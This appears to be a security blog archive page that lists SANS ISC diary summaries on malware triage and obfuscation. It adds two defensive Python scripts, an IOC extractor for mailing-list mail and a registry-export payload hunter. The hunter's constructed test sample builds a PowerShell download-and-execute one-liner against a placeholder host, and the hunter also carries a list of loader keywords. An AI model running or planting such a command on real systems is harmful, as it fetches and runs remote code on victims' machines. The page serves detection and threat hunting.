I published the following diary on isc.sans.edu: “Malware Triage with FLOSS: API Calls Based Behavior“: Malware triage is a key component of your hunting process. When you collect suspicious files from multiple sources, you need a tool to automatically process them to extract useful information. To achieve this task, I’m using
Category: SANS Internet Storm Center
[SANS ISC] Using Nmap As a Lightweight Vulnerability Scanner
I published the following diary on isc.sans.edu: “Using Nmap As a Lightweight Vulnerability Scanner“: Yesterday, Bojan wrote a nice diary about the power of the Nmap scripting language (based on Lua). The well-known port scanner can be extended with plenty of scripts that are launched depending on the detected ports.
[SANS ISC] Keeping an Eye on Malicious Files Life Time
I published the following diary on isc.sans.edu: “Keeping an Eye on Malicious Files Life Time“: We know that today’s malware campaigns are based on fresh files. Each piece of malware has a unique hash, which makes detection based on lists of hashes not very useful these days. But
[SANS ISC] Collecting IOCs from IMAP Folder
I published the following diary on isc.sans.edu: “Collecting IOCs from IMAP Folder“: I have plenty of subscriptions to “cyber security” mailing lists that generate a lot of traffic. Even if we try to get rid of emails, that’s a fact: email remains a key communication channel. Some mailing list posts contain
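The diary above is about pulling indicators out of mailing-list traffic sitting in an IMAP folder. The script below is an added example written for this page (it is not the diary's own code): it refangs the usual list conventions (hxxp://, [.] and [:]), extracts IPv4 addresses, hashes, URLs and domains from a message body, and drops noise such as file names and the list's own hosts. The sample message is constructed; fetch_bodies() shows the IMAP side with the standard library but is not executed here, so the example runs offline. The ignore list and the file-extension filter are assumptions you would tune for your own feeds.

```python
"""Extract IOCs from mailing-list e-mails stored in an IMAP folder.

Added example, not the diary's script. Only fetch_bodies() talks to a
server; everything else runs on the constructed SAMPLE_MAIL below.
"""
import email
import imaplib
import re
from email import policy
from urllib.parse import urlparse

# Indicators that mailing lists usually "defang" so they are not clickable.
def refang(text: str) -> str:
    text = re.sub(r"(?i)hxxp", "http", text)          # hxxp:// -> http://
    text = re.sub(r"\[(\.|:)\]", r"\1", text)          # [.] / [:] -> . / :
    text = re.sub(r"\((\.)\)", r"\1", text)            # (.) -> .
    return text.replace("[@]", "@")

PATTERNS = {
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "sha256": re.compile(r"\b[a-fA-F0-9]{64}\b"),
    "sha1": re.compile(r"\b[a-fA-F0-9]{40}\b"),
    "md5": re.compile(r"\b[a-fA-F0-9]{32}\b"),
    "url": re.compile(r"\bhttps?://[^\s<>\"')\]]+"),
    "domain": re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I),
}
# Assumption: tokens ending in these are file names, not domains.
FILE_EXTENSIONS = {"exe", "dll", "js", "vbs", "ps1", "doc", "docx", "xls",
                   "xlsm", "zip", "rtf", "txt", "hta", "jar", "bat", "lnk"}

def extract_iocs(body: str, ignore_domains=frozenset()) -> dict:
    """Return {kind: sorted list of indicators} found in one message body."""
    text = refang(body)
    found = {k: {m.group(0) for m in p.finditer(text)} for k, p in PATTERNS.items()}
    ignore = {d.lower() for d in ignore_domains}
    # Keep only syntactically valid IPv4 addresses.
    found["ipv4"] = {ip for ip in found["ipv4"]
                     if all(int(o) <= 255 for o in ip.split("."))}
    found["domain"] = {d.lower() for d in found["domain"]
                       if d.rsplit(".", 1)[1].lower() not in FILE_EXTENSIONS
                       and d.lower() not in ignore}
    found["url"] = {u.rstrip(".,;") for u in found["url"]
                    if (urlparse(u).hostname or "").lower() not in ignore}
    for kind in ("md5", "sha1", "sha256"):
        found[kind] = {h.lower() for h in found[kind]}
    return {k: sorted(v) for k, v in found.items()}

def fetch_bodies(host, user, password, folder="INBOX", limit=50):
    """Text bodies of the last `limit` messages in `folder` over IMAPS.
    Needs a live server; not called in this offline demo."""
    bodies = []
    with imaplib.IMAP4_SSL(host) as conn:
        conn.login(user, password)
        conn.select(folder, readonly=True)
        _, data = conn.search(None, "ALL")
        for num in data[0].split()[-limit:]:
            _, msg_data = conn.fetch(num, "(RFC822)")
            msg = email.message_from_bytes(msg_data[0][1], policy=policy.default)
            part = msg.get_body(preferencelist=("plain", "html"))
            if part is not None:
                bodies.append(part.get_content())
    return bodies

# Constructed sample post; the indicators below are documentation ranges.
SAMPLE_MAIL = """\
Subject: [list] New maldoc campaign (constructed sample, not a real post)

Heads up, a new campaign drops a Word document from
hxxp://evil-domain[.]com/dl/invoice.doc and beacons to 203[.]0[.]113[.]45
and update.evil-domain[.]com.
SHA256: 9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
MD5: d41d8cd98f00b204e9800998ecf8427e
Source: https://isc.sans.edu/ (not an IOC)
"""

if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_MAIL, {"isc.sans.edu"}).items():
        print(f"{kind}: {values}")
```

Running the script on the constructed message yields the C2 host and domains, the two hashes and the download URL, while the ISC reference and invoice.doc are filtered out; in practice you would feed the output of fetch_bodies() into extract_iocs() and de-duplicate across messages before pushing anything to a blocklist.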
[SANS ISC] Powershell Payload Stored in a PSCredential Object
I published the following diary on isc.sans.edu: “Powershell Payload Stored in a PSCredential Object“: An interesting obfuscation technique to store a malicious payload in a PowerShell script: In a PSCredential object! The PSCredential class can be used to manage credentials in a centralized way. Just have a look at this example. First, let’s encrypt
[SANS ISC] Malicious Excel With a Strong Obfuscation and Sandbox Evasion
I published the following diary on isc.sans.edu: “Malicious Excel With a Strong Obfuscation and Sandbox Evasion“: For a few weeks, we have seen a bunch of Excel documents spread in the wild with Macro V4 (Excel 4.0 macros). But VBA macros remain a classic way to drop the next stage of the attack on the
[SANS ISC] Weaponized RTF Document Generator & Mailer in PowerShell
I published the following diary on isc.sans.edu: “Weaponized RTF Document Generator & Mailer in PowerShell“: Another piece of malicious PowerShell script that I found while hunting. Like many malicious activities that occur these days, it is related to the COVID19 pandemic. Its purpose is simple: It checks if Outlook
[SANS ISC] PowerShell Sample Extracting Payload From SSL
I published the following diary on isc.sans.edu: “PowerShell Sample Extracting Payload From SSL“: Another diary, another technique to fetch a malicious payload and execute it on the victim host. I spotted this piece of PowerShell code this morning while reviewing my hunting results. It implements a very interesting technique. As usual,
[SANS ISC] Obfuscated with a Simple 0x0A
I published the following diary on isc.sans.edu: “Obfuscated with a Simple 0x0A“: With the current Coronavirus pandemic, we continue to see more and more malicious activity around this topic. Today, we got a report from a reader who found a nice malicious Word document part of a Coronavirus phishing campaign. I
[SANS ISC] Malicious JavaScript Dropping Payload in the Registry
I published the following diary on isc.sans.edu: “Malicious JavaScript Dropping Payload in the Registry“: When we speak about “fileless” malware, it means that the malware does not use the standard filesystem to store temporary files or payloads. But it still needs to write data somewhere on the system for persistence or
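Because a "fileless" dropper still has to park its payload somewhere, the registry is a natural hiding place, and a registry export is a cheap place to hunt for it. The script below is an added example for this page (editor's code, not the diary's): it parses a .reg export such as the one produced by `reg export HKCU out.reg`, decodes string values that are valid base64 and hex-encoded binary values, and flags those that contain script launchers or a PE header. The export, the planted payload and the keyword list are constructed for the demo, and the 100-character threshold is an assumption to tune.

```python
"""Hunt for payloads stashed in registry values (.reg export parser).

Added example, not the diary's script. SAMPLE_REG is constructed below;
a real export comes from: reg export HKCU out.reg
"""
import base64
import re

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"(.+?)"=(.*)$')
MIN_LEN = 100  # assumption: shorter strings rarely carry a payload
# Lower-case markers of script launchers / loaders commonly seen in stashed payloads.
SUSPICIOUS = ("powershell", "iex ", "wscript", "activexobject", "eval(",
              "frombase64string", "-enc", "downloadstring", "regread")

def parse_reg(text):
    """Yield (key, value_name, raw_value) from a .reg export.
    Long hex values are wrapped with a trailing backslash; join them first."""
    text = re.sub(r"\\\r?\n\s*", "", text)
    key = None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and key:
            yield key, m.group(1), m.group(2)

def decode_value(raw):
    """Return the bytes a value carries, or None if it cannot hold a payload.
    Quoted strings are base64-decoded when valid; hex:/hex(N): values are
    turned into bytes; dword and short strings are ignored."""
    if raw.startswith('"') and raw.endswith('"'):
        s = raw[1:-1].replace("\\\\", "\\").replace('\\"', '"')
        if len(s) < MIN_LEN:
            return None
        try:
            return base64.b64decode(s, validate=True)
        except ValueError:
            return s.encode("latin-1", "replace")  # long plain string: scan as-is
    m = re.match(r"hex(?:\(\d+\))?:(.*)", raw)
    if m:
        return bytes.fromhex(m.group(1).replace(",", ""))
    return None

def as_text(blob):
    """Decode as UTF-16LE when the even-byte zeros suggest it (PowerShell -enc), else Latin-1."""
    if len(blob) >= 4 and blob[1::2].count(0) > len(blob) // 4:
        return blob.decode("utf-16-le", "replace")
    return blob.decode("latin-1")

def find_payloads(reg_text):
    """Return one dict per suspicious value: key, name, size, reasons, preview."""
    hits = []
    for key, name, raw in parse_reg(reg_text):
        blob = decode_value(raw)
        if not blob:
            continue
        text = as_text(blob)
        low = text.lower()
        reasons = [k for k in SUSPICIOUS if k in low]
        if blob.startswith(b"MZ"):
            reasons.append("PE header")
        if reasons:
            hits.append({"key": key, "name": name, "size": len(blob),
                         "reasons": reasons, "preview": text[:60]})
    return hits

# Constructed sample: a benign Run entry next to a base64 stage stored by a dropper.
PAYLOAD = ('powershell -nop -w hidden -c "IEX (New-Object Net.WebClient)'
           ".DownloadString('http://example.invalid/stage2')\"")
B64 = base64.b64encode(PAYLOAD.encode()).decode()
SAMPLE_REG = f"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]
"OneDrive"="C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe /background"

[HKEY_CURRENT_USER\\Software\\AppDataLow\\Stage]
"Data"="{B64}"
"Flag"=dword:00000001
"""

if __name__ == "__main__":
    for hit in find_payloads(SAMPLE_REG):
        print(f"{hit['key']}\\{hit['name']} ({hit['size']} bytes): {hit['reasons']}")
        print("  ", hit["preview"])
```

On the constructed export the only hit is the Stage\Data value, flagged for the powershell, IEX and DownloadString markers; the Run entry is too short to be decoded and the dword is skipped. Pair this with the Run/RunOnce keys and WMI subscriptions when you look for the tiny launcher that reads the blob back, since the payload alone does nothing without it.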